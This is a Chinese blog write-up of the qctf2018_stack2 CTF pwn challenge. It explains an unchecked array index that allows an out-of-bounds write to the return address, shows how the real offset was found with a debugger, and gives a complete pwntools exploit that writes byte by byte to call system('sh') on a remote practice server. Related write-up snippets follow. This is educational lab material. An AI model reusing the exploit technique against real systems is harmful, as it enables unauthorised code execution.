qctf2018_stack2(数组越界,偏移寻找)

最新推荐文章于 2023-12-14 11:36:46 发布
最新推荐文章于 2023-12-14 11:36:46 发布
阅读量746 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121292902
版权

qctf2018_stack2:

请添加图片描述

程序分析:

漏洞出现在change这里,没有对v5作边界检查,我们能造成越界,直接读数到ret地址
请添加图片描述
后门函数:
请添加图片描述

两个小trick:

1.我们都会以为偏移是0x70+4,而实际却是0x84
跟着这位师傅的文章调试:
https://zhuanlan.zhihu.com/p/301091515
首先ida找到首次出现v13的地方,可以看到在for循环里
在这里插入图片描述
我们接着看这部分的Text view
在这里插入图片描述
断点下在0x80486ae,得到v13真实地址为0xffffd028
在这里插入图片描述
继续调试,选项选5,使程序结束,执行到ret时看esp,就是ret的地址
得到地址为0xffffd0ac
请添加图片描述
偏移=0xffffd0ac-0xffffd028=0x84
2.后门的/bin/bash并没有用,我们要rop下,用sh
system_addr+任意+sh_addr

exp:

from pwn import *
from LibcSearcher import *
local_file  = './stack2'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',27594 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#----------------------------------
def write(offest,addr):
    sla('5. exit\n','3')
    sla('which number to change:\n',str(offest))
    sla('new number:\n',str(addr))
#----------------------------------
backdoor=0x804859b
system_plt=0x8048450
sh_addr=0x8048987
sla('How many numbers you have:\n','1')
sla('Give me your numbers\n','1')
offest=0x84
write(offest,0x9b)
write(offest+1,0x85)
write(offest+2,0x04)
write(offest+3,0x08)
#--------------------------------
write(offest+8,0x87)
write(offest+9,0x89)
write(offest+10,0x04)
write(offest+11,0x08)
#---------------------------------
sla('5. exit\n','5')
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF 4th-QCTF-2018 pwn stack2 writeup
qq_39596232的博客
08-30 861
题目描述: 暂无 分析思路: 1、首先拿到ELF文件,我们首先查看一下详细信息: tucker@ubuntu:~/pwn$ file stack2 stack2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux...
qctf2018_stack2
z1r0的博客
02-24 1037
qctf2018_stack2 查看保护 这里没有对v13的下标进行判断和限制,所以可以进行一个溢出,又给了一个bk所以直接覆盖ret地址即可。 但是这里有一个小坑点,ida里面的偏移分析错了。所以笔者这里动态调试一下。 v13这个数组的地址在0xfffce38这里。 esp为0xffffcebc 所以距离0xffffcebc - 0xfffce38 = 0x84 又因为是数组类型,所以覆盖的时候需要分四次改。 from pwn import * context(arch='i386', os='
QCTF2018stack2------<ASLR保护机制>
qq_21746331的博客
12-27 500
QCTF2018_stack2前言知识点详解0x1 ASLR保护机制writeupexp 前言 在最简单的栈溢出中,如果程序中存在获取shell的后门函数,则只需要简单的通过溢出手段将函数的返回地址修改为后门函数的地址,便可以轻松获取shell。而对于没有提供后门函数的程序,可以通过往栈里面写入shellcode,在返回的时候将控制流劫持到栈里面的shellcode获取shell。但是对于加入NX保护的程序,在栈中写入shellcode的方法则不再适用,而ROP就是其中一种绕过保护的手段。ROP的全称为R
[BUUCTF]PWN——qctf2018_stack2
mcmuyanga的博客
04-12 582
qctf2018_stack2 例行检查 ,32位程序,开启了canary和nx保护 本地运行一下,看看大概的情况 32位ida载入,检索字符串发现了后门 main函数太长了,贴一下关键部分,漏洞点在修改v13数组里的值。 利用数组越界漏洞去修改ret,将ret修改成backdoor即可。 一开始我想当然的认为偏移是0x70+4,但是实际利用的时候发现不对。动调找一下吧 我输入的数据是12,存储在了0xffffcf38处,v13数组的地址 找一下函数结束的时候esp的地址 相差0
qctf-school-2015:QCTF 学校 2015
06-06
QCTF 学校 2015 这是 QCTF School 2015 竞赛的开发库 - 面向学童的面对面 CTF 竞赛,由 Hackerdom 团队举办( )。 比赛于2015年5月10日举行。 QCTF校规可在大赛官网查看- 任务文件夹包含任务。 每个任务都在...
通过遗传优化的小波阈值滤波降低ECG信号的噪声
02-25
设计了二次曲线阈值函数(QCTF)来实现阈值点的平滑连接。 此外,针对均方根误差和滤波平滑度,设计了一种新的遗传算法来针对不同的噪声信号自动搜索QCFT的最优参数。 最后,通过MIT-BIH心律失常数据库ECG记录评估...
[BUUCTF-pwn]——qctf2018_stack2
Y_peak的博客
04-02 355
[BUUCTF-pwn]——qctf2018_stack2 这道题注意一点v3的类型就好, 其他应该木有什么可以说的吧, 它是char*类型., 也就是每个我们赋值的v7只有低位的一个字节可以写进去 漏洞就在这里, 可以利用这里, 以v3为基准修改任意地址的数据. 还有一点需要注意的是偏移, 我最一开始写的时候, 想当然写成了0x40+4 主要原因是因为画圈的位置改变了esp, 懒得看汇编往上面找了直接动态调试. 第一次执行该汇编的时候, eax就是我们开始输入的位置 然后直接定位到retn看栈顶
pwn CTF 4th-QCTF-2018 stack2
qq_41071646的博客
01-23 3410
先把程序跑一遍看看·~~~~~~~ 然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~  然后我们 咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida 这里好像没有什么毛病  限制了 输入的数量是99 然后往下看   这里就是bug了    因为我们没有检查v13数组的边界 这里我们可...
[QCTF2018]babyre
qq_37439229的博客
05-07 575
一道一般般的题。。。 打开ida,调试到这里 发现长度为0x20,于是输入“ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^-`” 第一个函数 打乱我的输入顺序,第二个函数从第三个数开始,每四个为一组分别加一些数,第三个函数从第9个开始,每四个一组进行一些位运算 写出脚步 flag=[0xda,0xd8,0x3d,0x4c,0xe3,0x63,0x97,0x3d,0xc1,0x91,...
3.stack2
weixin_44864859的博客
07-27 390
这是一道数组越界的题目。数组存放在栈上,程序中给出有修改数组中数据的功能,但是没有限制范围,使得其可以修改栈上任意地址。 所以我只需要将main函数的返回地址修改成后门函数就可以了。 接下来就是确定偏移,这里把我卡住了。最一开始的想法是直接用返回地址减去输入地址,得到的偏移是0x9c,带入测试发现不行。看到这里有人肯定都要嘲笑我了,我真的是太蠢了,而且还觉得没什么问题捣鼓了半天,太菜了。。。 言归正传,要定偏移,首先我们需要搞清楚程序中修改数组数据的部分具体是怎么执行的。 这里可以看到程序具体要修改的
(BUUCTF)qctf_2018_noleak
最新发布
xy1458214551的博客
12-14 38
BUUCTF上的qctf_2018_noleak题解
QCTF 2018线上赛 writeup
weixin_33896069的博客
07-16 648
本次算是被QCTF打趴了,本来做题时间就少(公司无限开会,开了一天,伪借口),加上难度和脑洞的增大,导致这次QCTF又酱油了。。。就连最基本的签到题都没做出来。。。这就很气 好了,以下是解题思路 MISC 0x01 X-man-A face 下载附件,得到图片 简单拖进binwalk扫一下,无果,查看附件属性信息,无果。 最后尝试补全一下图中的二维码 打开...
qctf mips
MozhuCY的博客
07-16 447
题目分析分析代码,首先是第一个函数(简单异或,操作以后和一个长度为5的字符串作比较比较通过后,进入下一个函数,再次处理后27字符,后发现函数根据i&1的返回值分开了执行顺序,即奇偶分开加密 两端代码极其相似(一开始我弄没做出来,看了好久才发现= =) 实际上这两个操作是一个可逆的高低位互换(高二低六) 下面放出脚本#include <stdio.h> #include <...
Stack2 攻防世界题目分析
shanwei274的博客
04-18 1027
—XCTF 4th-QCTF-2018 前言,怎么说呢,这题目还是把我折磨的可以的,我一开始是没有看到后面的直接狙击的,只能说呢。 我的不经意间的粗心,破坏了你许多的温柔 1.气的我直接检查保护: 32位程序,开启了canary保护。 2.ida查看: 首先放的第一幅图片呢,是我一开始以为可以溢出的,也可以看见我旁边标注了一个maybeoverflow。 但是是不可以的,因为首先由于这里的 i 最大上限100,可能有的人头铁就要说了,这里v7可以慢慢溢出去修改i,(和我一样) 可是这里v13的存储位
gyctf_2020_document(uaf)
m0_51251108的博客
11-14 990
gyctf_2020_document: 保护全开 漏洞分析: delete函数里指针未清零 大致思路: 这题限制了add时chunk的size,为0x8和0x80,edit时只能从+0x10处改0x70个字符 1.先add一个chunk,在add一个chunk,这个chunk里的name填/bin/sh\x00 (这时0x8chunk中存有指向binsh地址的指针了),我们释放第一个chunk,由于0x80大小,释放到unsortbin中,我们show,就能泄露libc 2.我们接下来的目的是控制申请
BUUCTF刷题1
m0_51251108的博客
05-19 338
BUUCTF刷题wp题目:babyheap_0ctf_2017:pwn2_sctf_2016:[ZJCTF 2019]EasyHeap:hitcontraining_uaf:babyfengshui_33c3_2016:pwnable_orw:picoctf_2018_buffer overflow 2:xdctf2015_pwn200:jarvisoj_level1:ciscn_2019_n_3:bbys_tu_2016:inndy_rop:roarctf_2019_easy_pwn:mrctf2020_
QCTF 2018xman夏令营选拔赛
Xi4or0uji
07-15 2182
小肉鸡太菜了,就只做了三题orz....... x-man-a-face 这题挺简单的,拿到一个图片,看见有个二维码 发现少了两个定位点,用photoshop补全 扫一下就出来一串KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I= 然后base32解码就行了 Lottery 这题是弱类型匹配,进...
攻防世界 newscenter
09-08
最后,通过执行以下SQL语句search=-1' union select 1,version(),group_concat(fl4g) from secret_table --,我们可以得到flag的值为QCTF{sq1_inJec7ion_ezzz}。这是一个CTF比赛中的一个关卡,攻防世界的NewsCenter...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值